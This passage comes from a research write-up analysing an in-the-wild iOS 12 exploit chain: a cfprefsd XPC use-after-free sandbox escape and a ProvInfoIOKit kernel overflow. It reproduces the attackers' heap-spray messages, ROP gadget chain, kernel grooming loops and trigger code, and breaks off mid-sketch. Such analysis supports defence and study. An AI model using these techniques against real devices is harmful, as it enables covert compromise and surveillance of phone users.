Similar to iOS Exploit Chain 3, it seems that testing and verification processes should have identified this exploit chain. 

In the detailed writeup towards the end of this series, we'll look at how the attackers exploited both these issues to install their implant and spy on users, and the capabilities of the real-time surveillance that it enabled.
In-the-wild iOS Exploit Chain 4 - cfprefsd + ProvInfoIOKit
targets: 5s through X, 12.0 through 12.1 (vulnerabilities patched in 12.1.4)

iPhone6,1 (5s, N51AP)
iPhone6,2 (5s, N53AP)
iPhone7,1 (6 plus, N56AP)
iPhone7,2 (6, N61AP)
iPhone8,1 (6s, N71AP)
iPhone8,2 (6s plus, N66AP)
iPhone8,4 (SE, N69AP)
iPhone9,1 (7, D10AP)
iPhone9,2 (7 plus, D11AP)
iPhone9,3 (7, D101AP)
iPhone9,4 (7 plus, D111AP)
iPhone10,1 (8, D20AP)
iPhone10,2 (8 plus, D21AP)
iPhone10,3 (X, D22AP)
iPhone10,4 (8, D201AP)
iPhone10,5 (8 plus, D211AP)
iPhone10,6 (X, D221AP)

16A366 (12.0 - 17 Sep 2018)
16A404 (12.0.1 - 8 Oct 2018)
16B92 (12.1 - 30 Oct 2018)

first unsupported version 12.1.1 - 5 Dec 2018

getting _start'ed
Like in iOS Exploit Chain 3, this privilege escalation binary doesn't rely on the system Mach-O loader to resolve dependencies; instead, symbols are resolved when execution begins.

They terminate all the other threads running in this task, then check for their prior exploitation marker. Previously we've seen them add a string to the bootargs sysctl. They changed to a new technique this time:

  sysctl_value = 0;
  value_size = 4;
  sysctlbyname("kern.maxfilesperproc", &sysctl_value, &value_size, 0, 0);
  if ( sysctl_value == 0x27FF )
  {
    while ( 1 )
      sleep(1000LL);
  }

If kern.maxfilesperproc has the value 0x27ff, then this device is considered to be already compromised, and the exploit stops.

XPC again
Like iOS Exploit Chain 3, this chain has separate sandbox escape and kernel exploits. The sandbox escape involves XPC again, but this time it's not core XPC code but a daemon incorrectly using the XPC API.

Object lifetime management in XPC
XPC has quite detailed man pages which cover the lifetime semantics of XPC objects. Here's a relevant snippet from $ man xpc_objects:

MEMORY MANAGEMENT     Objects returned by creation functions in the XPC framework may be uniformly retained and released with the functions xpc_retain() and xpc_release() respectively.
     The XPC framework does not guarantee that any given client has the last or only reference to a given object. Objects may be retained internally by the system.
     Functions which return objects follow the conventional create, copy and get naming rules:
  o create  A new object with a single reference is returned.
            This reference should be released by the caller.
  o copy    A copy or retained object reference is returned.
            This reference should be released by the caller.
  o get     An unretained reference to an existing object is returned.
            The caller must not release this reference, and is responsible
            for retaining the object for later use if necessary.
XPC objects are reference counted. xpc_retain can be called to manually take a reference, and xpc_release to drop a reference. All XPC functions with copy in the name return an object with an extra reference to the caller, and XPC functions with get in the name do not return an extra reference. The man page tells us that if we call an XPC function with get in the name "an unretained reference to an existing object is returned. The caller must not release this reference." A case of code doing exactly that is what we'll look at now.
cfprefsd is an XPC service hosted by the cfprefsd daemon. This daemon is unsandboxed and runs as root, and is directly reachable from the app sandbox and the WebContent sandbox.

The cfprefsd binary is just a stub, containing a single branch to __CFXPreferencesDaemon_main in the CoreFoundation framework. All the code is in the CoreFoundation framework.

__CFXPreferencesDaemon_main allocates a CFPrefsDaemon object which creates the XPC service listening on the default concurrent dispatch queue, giving it a block to execute for each incoming connection. Here's pseudo-Objective-C for the daemon setup code:

[CFPrefsDaemon initWithRole:role testMode] {
  ...
  listener =
    xpc_connection_create_mach_service("",
                                       0,
                                       XPC_CONNECTION_MACH_SERVICE_LISTENER);

  xpc_connection_set_event_handler(listener, ^(xpc_object_t peer) {
    if (xpc_get_type(peer) == XPC_TYPE_CONNECTION) {
      xpc_connection_set_event_handler(peer, ^(xpc_object_t obj) {
        if (xpc_get_type(obj) == XPC_TYPE_DICTIONARY) {
          context_obj = xpc_connection_get_context(peer);
          cfprefsd = context_obj.cfprefsd;
          [cfprefsd handleMessage:obj fromPeer:peer replyHandler:
            ^(xpc_object_t reply)
            {
              xpc_connection_send_message(peer, reply);
            }];
        }
      });

      // move to a new queue:
      char label[0x80];
      pid_t pid = xpc_connection_get_pid(peer);
      dispatch_queue_t queue;
      int label_len = snprintf(label, 0x80, "Serving PID %d", pid);
      if (label_len > 0x7e) {
        queue = NULL;
      } else {
        queue = dispatch_queue_create(label, NULL);
      }
      xpc_connection_set_target_queue(peer, queue);

      context_obj = [[CFPrefsClientContext alloc] init];
      context_obj.lock = 0;
      context_obj.cfprefsd = self; // the CFPrefsDaemon object
      context_obj.isPlatformBinary = -1; // char
      context_obj.valid = 1;
      xpc_connection_set_context(peer, context_obj);
      xpc_connection_set_finalizer(peer, client_context_finalizer);
      xpc_connection_resume(peer);
    }
  });
}
This block creates a new serial dispatch queue for each connection and provides a block for each incoming message on the connection.

Each XPC message on a connection ends up being handled by [CFPrefsDaemon handleMessage:fromPeer:replyHandler:] :

-[CFPrefsDaemon handleMessage:msg fromPeer:peer replyHandler: handler] {
  if (xpc_get_type(msg) == XPC_TYPE_ERROR) {
    [self handleError:msg];
  } else {
    xpc_dictionary_set_value(msg, "connection", peer);
    uint64_t op = xpc_dictionary_get_uint64(msg, "CFPreferencesOperation");
    switch (op) {
     case 1:
     case 7:
     case 8:
      [self handleSourceMessage:msg replyHandler:handler];
      break;
     case 2:
      [self handleAgentCheckInMessage:msg replyHandler:handler];
      break;
     case 3:
      [self handleFlushManagedMessage:msg replyHandler:handler];
      break;
     case 4:
      [self handleFlushSourceForDomainMessage:msg replyHandler:handler];
      break;
     case 5:
      [self handleMultiMessage:msg replyHandler:handler];
      break;
     case 6:
      [self handleUserDeletedMessage:msg replyHandler:handler];
      break;
     default:
      // send error reply
    }
  }
}
handleMultiMessage sounds like the most interesting one; here's the pseudocode:

-[CFPrefsDaemon handleMultiMessage:msg replyHandler: handler]
{
  xpc_object_t peer = xpc_dictionary_get_remote_connection(msg);
  // ...
  xpc_object_t messages = xpc_dictionary_get_value(msg, "CFPreferencesMessages");
  if (!messages || xpc_get_type(messages) != OS_xpc_array) {
    // send error message
  }

  // may only contain dictionaries or nulls:
  bool all_types_valid = xpc_array_apply(messages, ^(xpc_object_t entry) {
    xpc_type_t type = xpc_get_type(entry);
    return (type == XPC_TYPE_DICTIONARY || type == XPC_TYPE_NULL);
  });

  if (!all_types_valid) {
    // return error
  }

  size_t n_sub_messages = xpc_array_get_count(messages);

  // macro from CFInternal.h
  // allocates either on the stack or heap
  new_id_array(sub_messages, n_sub_messages);

  if (n_sub_messages > 0) {
    for (size_t i = 0; i < n_sub_messages; i++) {
      // raw pointers, not holding a reference
      sub_messages[i] = xpc_array_get_value(messages, i);
    }

    for (size_t i = 0; i < n_sub_messages; i++) {
      if (xpc_get_type(sub_messages[i]) == XPC_TYPE_DICTIONARY) {
        [self handleMessage: sub_messages[i]
              fromPeer: peer
              replyHandler: ^(xpc_object_t reply) {
                sub_messages[i] = xpc_retain(reply);
              }];
      }
    }
  }

  xpc_object_t reply = xpc_dictionary_create_reply(msg);
  xpc_object_t replies_arr = xpc_array_create(sub_messages, n_sub_messages);
  xpc_dictionary_set_value(reply, "CFPreferencesMessages", replies_arr);

  if (n_sub_messages) {
    for (size_t i = 0; i < n_sub_messages; i++) {
      if (xpc_get_type(sub_messages[i]) != XPC_TYPE_NULL) {
        xpc_release(sub_messages[i]);
      }
    }
  }
The multiMessage handler is expecting the input message to be an xpc_array of xpc_dictionary objects, which would be the sub-messages to process. It pulls each of them out of the input xpc_array with xpc_array_get_value and passes them to the handleMessage method but with a different replyHandler block which, rather than immediately sending the reply message back to the client, instead overwrites the input sub-message pointer in the sub_messages array with the reply. When all the sub-messages have been processed they create an xpc_array from all the replies and invoke the replyHandler passed to this function passing a reply message containing an xpc_array of sub-message replies.

The bug here is slightly subtle. If we imagine that there is no multiMessage, then the semantics of the replyHandler block which gets passed to each message handler are: "invoke me to send a reply". Hence the name "replyHandler". For example, message type 3 is handled by handleFlushManagedMessage, which invokes the replyHandler block to return a reply.

However not all of the message types expect to send a reply. Think of them like void functions in C; they have no return value. Since they don't return a value, they don't send a reply message. And that means that they don't invoke the replyHandler block. Why would you invoke a block called replyHandler if you had no reply to send?

The problem is that multiMessage has changed the semantics of the replyHandler block; multiMessage's replyHandler block takes a reference on the reply object and overwrites the input message object in the sub_messages array:

    for (size_t i = 0; i < n_sub_messages; i++) {
      if (xpc_get_type(sub_messages[i]) == XPC_TYPE_DICTIONARY) {
        [self handleMessage: sub_messages[i]
              fromPeer: peer
              replyHandler: ^(xpc_object_t reply) {
                sub_messages[i] = xpc_retain(reply);
              }];
      }
    }
But as we saw, there's no guarantee that the replyHandler block is going to be invoked at all; in fact some of the message handlers are just NOPs and do nothing at all.

This becomes a problem because the multiMessage replyHandler block changes the lifetime semantics of the pointers stored in the sub_messages array. When the sub_messages array is initialized it stores raw, unretained pointers, returned by an xpc_*get* method:

    for (size_t i = 0; i < n_sub_messages; i++) {
      // raw pointers, not holding a reference
      sub_messages[i] = xpc_array_get_value(messages, i);
    }
xpc_array_get_value returns the raw pointer at the given offset in the xpc_array. It doesn't return a pointer holding a new reference. Therefore it's not valid to use that pointer beyond the lifetime of the messages xpc_array. The replyHandler block then reuses the sub_messages array to store the replies to each of the sub-messages, but this time it takes a reference on the reply objects it stores in there:

    for (size_t i = 0; i < n_sub_messages; i++) {
      if (xpc_get_type(sub_messages[i]) == XPC_TYPE_DICTIONARY) {
        [self handleMessage: sub_messages[i]
              fromPeer: peer
              replyHandler: ^(xpc_object_t reply) {
                sub_messages[i] = xpc_retain(reply);
              }];
      }
    }
Once all the sub_messages have been handled they attempt to release all of the replies:

  if (n_sub_messages) {
    for (size_t i = 0; i < n_sub_messages; i++) {
      if (xpc_get_type(sub_messages[i]) != XPC_TYPE_NULL) {
        xpc_release(sub_messages[i]);
      }
    }
  }
If there were a sub-message which didn't invoke the replyHandler block, then this loop would xpc_release the input sub-message xpc_dictionary, returned via xpc_array_get_value, rather than a reply. As we know, xpc_array_get_value doesn't return a reference, so this would lead to a reference being dropped when none was taken. Since the only reference to the sub-message xpc_dictionary is held by the xpc_dictionary containing the request message, the xpc_release here will free the sub-message xpc_dictionary, leaving a dangling pointer in the request message xpc_dictionary. When that dictionary is released, it will call xpc_release on the sub-message dictionary again, causing an Objective-C selector to be sent to a free'd object.
Exploitation
Like iOS Exploit Chain 3, they also choose a heap and port spray strategy here. But they don't use a resource leak primitive, instead sending everything in the XPC trigger message itself.

Exploit flow
The exploit strategy here is to reallocate the free'd xpc_dictionary in the gap between the xpc_release when destroying the sub_messages and the xpc_release of the outer request message. They do this by using four threads, running in parallel. Threads A, B and C start up and wait for a global variable to be set to 1. When that happens they each try 100 times to send the following XPC message to the service:

{ "CFPreferencesOperation": 5,
  "CFPreferencesMessages" : [10'000 * xpc_data_spray] }
where xpc_data_spray is a 448-byte xpc_data buffer filled with the qword value 0x118080000. This is the target address to which they will try to heapspray. They are hoping that the contents of one of these xpc_data's 448-byte backing buffers will overlap with the free'd xpc_dictionary, completely filling the memory with the heapspray address.
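Building the backing buffer for one of these spray objects is straightforward. A minimal sketch, with the buffer size and target value taken from the description above and the helper name fill_spray_buffer being my own:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SPRAY_BUF_SIZE 448
#define SPRAY_TARGET   0x118080000ULL

/* Fill buf with back-to-back copies of a 64-bit value. */
static void fill_spray_buffer(uint8_t *buf, size_t size, uint64_t value) {
    assert(buf != NULL && size % sizeof(value) == 0);
    for (size_t off = 0; off < size; off += sizeof(value))
        memcpy(&buf[off], &value, sizeof(value));
}
```

A 448-byte buffer holds 56 copies of the qword. In the real exploit the bytes would presumably then be wrapped in an xpc_data object (for example via xpc_data_create) before being added to the message array.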

As we saw in [CFPrefsDaemon handleMultiMessage:replyHandler] this is not a valid multiMessage; the CFPreferencesMessages array may only contain dictionaries or NULLs. Nevertheless, it will take some time for all these xpc_data objects to be created, handleMultiMessage to run, fail and the xpc_data objects to be destroyed. They are hoping that with three threads trying this in parallel this replacement strategy will be good enough.
Trigger message
The bug will be triggered by a sub-message with an operation key mapping to a handler which doesn't invoke its reply block. They chose operation 4, handled by handleFlushSourceForDomainMessage. The trigger message looks like this:

{ "CFPreferencesOperation": 5,
  "CFPreferencesMessages" :
    [
      8000 * (op_1_dict, second_op_5_dict),
      150 * (second_op_5_dict, op_4_dict, op_4_dict, op_4_dict),
      third_op_5_dict
    ]
}
where the sub-message dictionaries are:

op_1_dict = {
  "CFPreferencesOperation": 1,
  "domain": "a",
  "A": 8_byte_xpc_data
}

second_op_5_dict = {
  "CFPreferencesOperation": 5
}

op_4_dict = {
  "CFPreferencesOperation": 4
}

third_op_5_dict = {
  "CFPreferencesOperation": 5,
  "CFPreferencesMessages" : [0x2000 * xpc_send_right,
                             0x10 * xpc_data_heapspray]
}
On 4k devices the heapspray xpc_data object is around 25MB, on 16k devices with more RAM it's around 30MB. They put 16 of them in the message, leading to 400MB of sprayed virtual address space on 4k and 500MB or so on 16k devices.
PC control
The racer threads are trying to refill free'd memory with the repeated pointer value 0x118080000. If things work out xpc_release will be called on an xpc_dictionary which is filled with that value.

What does xpc_release actually do? The first qword of an Objective-C object is its isa pointer. This is a pointer to the class object which defines the object's type. In xpc_release they check whether the isa points inside libxpc's __objc_data section. If so, it calls os_object_release. Since they've supplied a fake isa pointer (with the value 0x118080000) the other branch will be taken, calling objc_release. If the FAST_ALLOC bit is clear in the class object's bits field (bit 2 in the byte at offset 0x20) then this will result in the release selector being sent to the object, which is what will happen in this case:

[Figure: fake selector cache technique]

Building a fake Objective-C object to gain PC control when a selector is sent to it like this is a known technique. objc_msgSend is the native function responsible for handling selector invocations. It will first follow the isa pointer to the class object, then follow the pointer at +0x10 in there to a selector cache structure, which is an array of (function_pointer, selector) pairs; if the target selector matches an entry in the cache, then the cached function pointer is called.

Full control
At the point they gain PC control X0 points to the free'd xpc_dictionary object. In the previous chain which also had a sandbox escape they were able to quite easily pivot the stack by JOP'ing to longjmp. In iOS 12 Apple added some hardening to longjmp, on both the A12 using PAC and A11 and earlier devices without PAC. A12 devices are not supported by these exploits (though the exploits can be relatively easily ported to work on them).

Here's longjmp in iOS 12 for A11 and below:

__longjmp
MRS    X16, #3, c13, c0, #3 ; read TPIDRRO_EL0
AND    X16, X16, #0xFFFFFFFFFFFFFFF8
LDR    X16, [X16,#0x38] ; read a key from field 7
                        ; in the thread descriptor
LDP    X19, X20, [X0]
LDP    X21, X22, [X0,#0x10]
LDP    X23, X24, [X0,#0x20]
LDP    X25, X26, [X0,#0x30]
LDP    X27, X28, [X0,#0x40]
LDP    X10, X11, [X0,#0x50]
LDR    X12, [X0,#0x60]
LDP    D8, D9, [X0,#0x70]
LDP    D10, D11, [X0,#0x80]
LDP    D12, D13, [X0,#0x90]
LDP    D14, D15, [X0,#0xA0]
EOR    X29, X10, X16    ; use the key to XOR FP, LR and SP
EOR    X30, X11, X16
EOR    X12, X12, X16
MOV    SP, X12
CMP    W1, #0
CSINC  W0, W1, WZR, NE
RET
We looked at longjmp in iOS 11 for the iOS Exploit Chain 3 sandbox escape. The addition here in iOS 12 on A11 and below is the reading of a key from the thread local storage area and its use to XOR the LR, SP and FP registers.

Those first three instructions are the _OS_PTR_MUNGE_TOKEN macro from libsyscall:

#define _OS_PTR_MUNGE_TOKEN(_reg, _token) \
 mrs _reg, TPIDRRO_EL0 %% \
 and _reg, _reg, #~0x7 %% \
 ldr _token, [ _reg,  #_OS_TSD_OFFSET(__TSD_PTR_MUNGE) ]
This is reading from the TPIDRRO_EL0 system register (Read-Only Software Thread ID Register) which XNU points to the userspace thread local storage area. The key value is passed to new processes on exec via the special apple[] argument to main, generated here during exec:

/*
 * Supply libpthread & libplatform with a random value to use for pointer
 * obfuscation.
 */
error = exec_add_entropy_key(imgp, PTR_MUNGE_KEY, PTR_MUNGE_VALUES, FALSE);
The use of longjmp in iOS Exploit Chain 3 was just a technique; it wasn't fundamental to the exploit chain. longjmp was just a very convenient way to pivot the stack and gain full register control. Let's see how the attackers pivot the stack anyway, without the use of longjmp:

Here's gadget_0, which will be read from the fake Objective-C selector cache object. X0 will point to the dangling xpc_dictionary object which is filled with 0x118080000:

gadget_0:
LDR  X0, [X0,#0x18] ; X0 := (*(dangling_ptr+0x18)) (= 0x118080000)
LDR  X1, [X0,#0x40] ; X1 := (*(0x118080040)) (= gadget_1_addr)
BR   X1             ; jump to gadget_1
gadget_0 gives them X0 pointing to the heap-sprayed object, and branches to gadget_1:

gadget_1:
LDR  X0, [X0]       ; X0 := (*(0x118080000)) (= 0x118080040)
LDR  X4, [X0,#0x10] ; X4 := *(0x118080050) (= gadget_2_addr)
BR   X4             ; jump to gadget_2
gadget_1 gets a new, controlled value for X0 and jumps to gadget_2:

gadget_2:
LDP  X8, X1, [X0,#0x20] ; X8 := *(0x118080060) (=0x1180900c0)
                        ; X1 := *(0x118080068) (=gadget_4_addr)
LDP  X2, X0, [X8,#0x20] ; X2 := *(0x1180900e0) (=gadget_3_addr)
                        ; X0 := *(0x1180900e8) (=0x118080070)
BR   X2                 ; jump to gadget_3
gadget_2 gets control of X0 and X8 and jumps to gadget_3:

gadget_3:
STP  X8, X1, [SP]        ; *(SP) = 0x1180900c0
                         ; *(SP+8) = gadget_4_addr
LDR  X8, [X0]            ; X8 := *(0x118080070) (=0x118080020)
LDR  X8, [X8,#0x60]      ; X8 := *(0x118080080) (=gadget_4_addr+4)
MOV  X1, SP              ; X1 := real stack
BLR  X8                  ; jump to gadget_4+4
gadget_3 stores X8 and X1 to the real stack, creating a fake stack frame with a controlled value for the saved frame pointer (0x1180900c0) and a controlled return address (gadget_4_addr.) It then jumps to gadget_4+4:

gadget_4+4:
LDP X29, X30, [SP],#0x10 ; X29 := *(SP)   (=0x1180900c0)
                         ; X30 := *(SP+8) (=gadget_4_addr)
                         ; SP += 0x10
RET                      ; jump to LR (X30), gadget_4
This loads the frame pointer and link register from the real stack, from the addresses where they just wrote controlled values. This gives them arbitrary control of the frame pointer and link register. The RET jumps to the value in the link register, which is gadget_4:

gadget_4:
MOV  SP, X29              ; SP := X29 (=0x1180900c0)
LDP  X29, X30, [SP],#0x10 ; X29 := *(0x1180900c0) (=UNINIT)
                          ; X30 := *(0x1180900c8) (=gadget_5_addr)
                          ; SP += 0x10 (SP := 0x1180900d0)
RET                       ; jump to LR (X30), gadget_5
This moves their controlled frame pointer into the stack pointer register, loads new values for the frame pointer and link register from there and RETs to gadget_5, having successfully pivoted to a controlled stack pointer. The ROP stack from here on is very similar to PE3's sandbox escape stack; they use the same LOAD_ARGS gadget to load X0-X7 before each target function they want to call:

gadget_5: (LOAD_ARGS)
LDP   X0, X1, [SP,#0x80]
LDP   X2, X3, [SP,#0x90]
LDP   X4, X5, [SP,#0xA0]
LDP   X6, X7, [SP,#0xB0]
LDR   X8, [SP,#0xC0]
MOV   SP, X29
LDP   X29, X30, [SP],#0x10
RET
They also use the same memory_write gadget:

gadget_6: (MEMORY_WRITE)
LDR   X8, [SP]
STR   X0, [X8,#0x10]
LDP   X29, X30, [SP,#0x20]
ADD   SP, SP, #0x30
RET
See the writeup for iOS Exploit Chain 3 for an annotated breakdown of how the ROP stack using these gadgets works. It proceeds in a very similar way to iOS Exploit Chain 3; calling IOServiceMatching, IOServiceGetMatchingService then IOServiceOpen to get an IOKit UserClient mach port send right. They use the memory write gadget to write that port name to the four exfil messages, which they send in succession. In the WebContent process they listen on the portset for a message. If they receive a message, it's got a ProvInfoIOKitUserClient send right in it.
Kernel vulnerability
The sandbox escape sent back a connection to the ProvInfoIOKitUserClient user client class, present since at least iOS 10.

This class exposes an interface to userspace by overriding getTargetAndMethodForIndex, providing 6 external methods. getTargetAndMethodForIndex returns a pointer to an IOExternalMethod structure which describes the type and size of the expected inputs and outputs.

External method 5 is ucEncryptSUInfo, which takes a 0x7d8 byte structure input and returns a 0x7d8 byte structure output. These sizes are verified by the base IOUserClient class's implementation of IOUserClient::externalMethod; attempting to pass other sizes of input or output structure will fail.

This is the very first statement in ProvInfoIOKitUserClient::ucEncryptSUInfo; I haven't trimmed anything from the start of this function. struct_in points to a buffer of 0x7d8 attacker-controlled bytes. As seen in the introduction above:

IOReturn
ProvInfoIOKitUserClient::ucEncryptSUInfo(char* struct_in,
                                         char* struct_out){
  memmove(&struct_out[4],
          &struct_in[4],
          *(uint32_t*)&struct_in[0x7d4]);
...
IOKit external methods are akin to syscalls; the arguments are untrusted at this boundary. The very first statement in this external method is a memmove operation with a trivially user-controlled length argument.
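For contrast, here's what a bounds-checked version of that first statement might look like. To be clear, this is a sketch of the missing validation under the sizes described above (0x7d8-byte input and output structures, length field at 0x7d4, data starting at offset 4); it is not Apple's actual fix, and the function and macro names are mine:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define SU_INFO_SIZE   0x7d8u  /* size of struct_in and struct_out       */
#define SU_LEN_OFFSET  0x7d4u  /* where the untrusted length field lives */
#define SU_DATA_OFFSET 4u      /* where the copied data starts           */

/* Returns 0 on success, -1 if the untrusted length doesn't fit. */
static int copy_su_info_checked(const char *struct_in, char *struct_out) {
    uint32_t len;
    assert(struct_in != NULL && struct_out != NULL);
    memcpy(&len, &struct_in[SU_LEN_OFFSET], sizeof(len));
    if (len > SU_INFO_SIZE - SU_DATA_OFFSET)
        return -1; /* would read and write past the 0x7d8-byte buffers */
    memmove(&struct_out[SU_DATA_OFFSET], &struct_in[SU_DATA_OFFSET], len);
    return 0;
}
```

The largest length which still fits is 0x7d4 bytes, since the copy starts 4 bytes into each 0x7d8-byte buffer.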
Kernel exploitation
The start of the kernel exploit is the same as usual: get the correct kernel offsets for this device and create an IOSurfaceRootUserClient for attaching arbitrary OSObjects. They allocate the 0x800 pipes (first increasing the open files limit) and 1024 early ports.

Then they allocate 768 ports, split into four groups like this:

for ( i = 0; i < 192; ++i ) {
  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports_a[i]);
  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports_b[i]);
  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports_c[i]);
  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports_d[i]);
}
Then a further five standalone ports:

mach_port_allocate((unsigned int)mach_task_self_, 1LL,
                   &port_for_more_complex_kallocer);
mach_port_allocate((unsigned int)mach_task_self_, 1LL, &single_port_b);
mach_port_allocate((unsigned int)mach_task_self_, 1LL, &single_port_c);
mach_port_allocate((unsigned int)mach_task_self_, 1LL, &single_port_d);
mach_port_allocate((unsigned int)mach_task_self_, 1LL,
                   &first_kalloc_groomer_port);
They use a kalloc_groomer message to make 25600 kalloc.4096 allocations, then force a GC using the same new technique as iOS Exploit Chain 3.

They allocate 10240 before_ports, a target_port, and 5120 after_ports. This is again a carbon copy of what we've seen in the previous chains. It seems like they're setting up to give themselves a dangling pointer to target_port, do a zone transfer into kalloc.4096 and build a fake kernel task port.

They send a more complex kalloc_groomer which will make 1024 kalloc.4096 allocations followed by 1024 kalloc.6144 allocations. This fills in gaps in both those zones.

96 times they alternately send an out-of-line ports descriptor with 0x200 entries to a port from ports_a[] then a kalloc.4096 groomer to a port from ports_c[].

for ( j = 0; j < 96; ++j ) { // use the first half of these arrays of ports
  send_ool_ports_msg(some_of_ports_a[j],
                     some_ports_to_send_ool,
                     0x200u,
                     const_15_or_8,
                     0x14u); // 15 or 8 kalloc.4096 of ool_ports
  send_kalloc_groomer_msg(some_of_ports_c[j],
                          4096,
                          stack_buf_for_kalloc_groomer,
                          1); // kalloc.4096 of ool_desc
}
The kalloc.4096 containing the OOL_PORTS descriptor in the kernel will look like this:

+0x528 : target_port
+0x530 : target_port
+0xd28 : target_port
+0xd30 : target_port

Hopefully that approximately alternates with a kalloc.4096 which is empty. This gives them a kalloc.4096 which looks a bit like this:

where the P's are out-of-line ports descriptors with the above layout and the K's are empty kalloc.4096 from the out-of-line memory descriptors.

They then alternate another 96 times, first deserializing a 4104 byte OSData object filled with ASCII '1's and then sending a 4104 byte kalloc groomer which is empty. Both of these will result in kalloc.6144 allocations, as that's the next size class above kalloc.4096:

This leads to a layout a bit like that, where OSData backing buffers approximately alternate with empty out-of-line memory descriptors in kalloc.6144.

Making holes
They destroy the middle half of the kalloc.4096's, hopefully leaving gaps in between some of the out-of-line ports descriptors:

Similarly they destroy the middle half of the kalloc.6144 out-of-line memory descriptors:

They reallocate half the amount they just freed via a complex kallocer with 24 allocations, then trigger the overflow:

__int64 __fastcall trigger_overflow(mach_port_t userclient,
                                    uint32_t bad_length)
{
  int64 struct_out_size;
  char struct_out[0x7d8];
  char struct_in[0x7d8];

  memset(struct_in, 'A', 0x7D8LL);
  *(uint32_t*)struct_in = 1;
  *(uint32_t*)&struct_in[0x7D4] = bad_length;
  struct_out_size = 0x7D8LL;
  return IOConnectCallStructMethod(userclient,
                                   5,
                                   struct_in,
                                   0x7D8,
                                   struct_out,
                                   &struct_out_size);
}
To understand what happens here we need to look more closely at exactly how external method calls work:

IOConnectCallStructMethod is a wrapper function implemented in IOKitLib.c, part of the open source IOKitUser project. It's just a wrapper around IOConnectCallMethod:

kern_return_t
IOConnectCallStructMethod(mach_port_t connection,      // In
                          uint32_t    selector,        // In
                          const void* inputStruct,     // In
                          size_t      inputStructCnt,  // In
                          void*       outputStruct,    // Out
                          size_t*     outputStructCnt) // In/Out
{
  return IOConnectCallMethod(connection,   selector,
                             NULL,         0,
                             inputStruct,  inputStructCnt,
                             NULL,         NULL,
                             outputStruct, outputStructCnt);
}
IOConnectCallMethod is a more complex wrapper which selects the correct kernel MIG function to call based on the passed arguments; in this case that's io_connect_method:

rtn = io_connect_method(connection,         selector,
                        (uint64_t *) input, inputCnt,
                        inb_input,          inb_input_size,
                        ool_input,          ool_input_size,
                        inb_output,         &inb_output_size,
                        output,             outputCnt,
                        ool_output,         &ool_output_size);
The IOKitLib project doesn't contain the implementation of io_connect_method; neither does the XNU project, so where is it? io_connect_method is a MIG RPC method, defined in the device.defs file in the XNU project. Here's the definition:

routine io_connect_method (
      connection      : io_connect_t;
in    selector        : uint32_t;

in    scalar_input    : io_scalar_inband64_t;
in    inband_input    : io_struct_inband_t;
in    ool_input       : mach_vm_address_t;
in    ool_input_size  : mach_vm_size_t;

out   inband_output   : io_struct_inband_t, CountInOut;
out   scalar_output   : io_scalar_inband64_t, CountInOut;
in    ool_output      : mach_vm_address_t;
inout ool_output_size : mach_vm_size_t
);
Running the MIG tool on device.defs will generate the serialization and deserialization C code which userspace and the kernel use to implement the client and server parts of the RPC. This happens as part of the XNU build process.

The first argument to the MIG method is a mach port; this is the port to which the serialized message will be sent.

Receiving in EL1

In the mach message send path in ipc_kmsg.c there's the following check:

    if (port->ip_receiver == ipc_space_kernel) {
      ...
        /*
         * Call the server routine, and get the reply message to send.
         */
        kmsg = ipc_kobject_server(kmsg, option);
        if (kmsg == IKM_NULL)
            return MACH_MSG_SUCCESS;
If a mach message is sent to a port which has its ip_receiver field set to ipc_space_kernel it's not enqueued onto the receiving port's message queue. Instead the send path is short-circuited and the message is assumed to be a MIG serialized RPC request for the kernel and it's synchronously handled by ipc_kobject_server:

ipc_kmsg_t
ipc_kobject_server(
                   ipc_kmsg_t request,
                   mach_msg_option_t __unused option)
{
   ...
    int request_msgh_id = request->ikm_header->msgh_id;

    /*
     * Find out corresponding mig_hash entry if any
     */
    {
        unsigned int i = (unsigned int)MIG_HASH(request_msgh_id);
        int max_iter = mig_table_max_displ;

        do {
            ptr = &mig_buckets[i++ % MAX_MIG_ENTRIES];
        } while (request_msgh_id != ptr->num && ptr->num && --max_iter);

        if (!ptr->routine || request_msgh_id != ptr->num) {
            ptr = (mig_hash_t *)0;
            reply_size = mig_reply_size;
        } else {
            reply_size = ptr->size;
        }
    }

    /* round up for trailer size */
    reply_size += MAX_TRAILER_SIZE;
    reply = ipc_kmsg_alloc(reply_size);
This function looks up the message's msgh_id field in a table containing all the kernel MIG subsystems (not just those from device.defs, but also methods for task ports, thread ports, the host port and so on).

From that table it reads the maximum reply message size (which is static in MIG) and allocates a suitably sized reply ipc_kmsg structure. For more details on the ipc_kmsg structure see this blog post from a couple of years ago on using it for exploitation.
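
The lookup loop above is an open-addressing probe bounded by the largest displacement seen at insert time. The following is a minimal, self-contained sketch of that pattern, not XNU's code: TABLE_SIZE, TOY_HASH, struct entry, table_insert and table_lookup are hypothetical stand-ins, and the message ids used with it are arbitrary.

```c
#include <assert.h>
#include <stddef.h>

#define TABLE_SIZE 7          /* toy size; a stand-in for MAX_MIG_ENTRIES */
#define TOY_HASH(x) (x)       /* stand-in hash, assumed for illustration */

struct entry {
    int num;                  /* message id; 0 marks an empty bucket */
    int reply_size;           /* static maximum reply size for this id */
};

static struct entry buckets[TABLE_SIZE];
static int max_displ;         /* longest probe sequence needed so far */

/* Insert with linear probing and remember the worst-case probe length. */
void table_insert(int num, int reply_size)
{
    assert(num > 0);
    unsigned pos = (unsigned)TOY_HASH(num) % TABLE_SIZE;
    int howmany = 1;
    while (buckets[pos].num != 0) {
        pos = (pos + 1) % TABLE_SIZE;
        howmany++;
        assert(howmany <= TABLE_SIZE);   /* table must not be full */
    }
    buckets[pos].num = num;
    buckets[pos].reply_size = reply_size;
    if (howmany > max_displ)
        max_displ = howmany;
}

/* Same loop shape as the kernel listing: stop on a match, on an empty
 * bucket, or after max_displ probes. Returns NULL when nothing matches. */
const struct entry *table_lookup(int msgh_id)
{
    unsigned i = (unsigned)TOY_HASH(msgh_id);
    int max_iter = max_displ;
    const struct entry *ptr;

    if (max_iter == 0)
        return NULL;                     /* nothing inserted yet */
    do {
        ptr = &buckets[i++ % TABLE_SIZE];
    } while (msgh_id != ptr->num && ptr->num && --max_iter);

    if (ptr->num == 0 || msgh_id != ptr->num)
        return NULL;
    return ptr;
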